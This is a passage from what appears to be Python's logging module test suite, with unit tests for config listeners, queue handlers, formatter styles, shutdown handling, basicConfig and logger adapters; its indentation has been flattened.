logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.apply_config(self.out_of_order)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = support.TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = support.TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
if threading:
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.level = self.original_logging_level
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='foo')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, 'foo')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
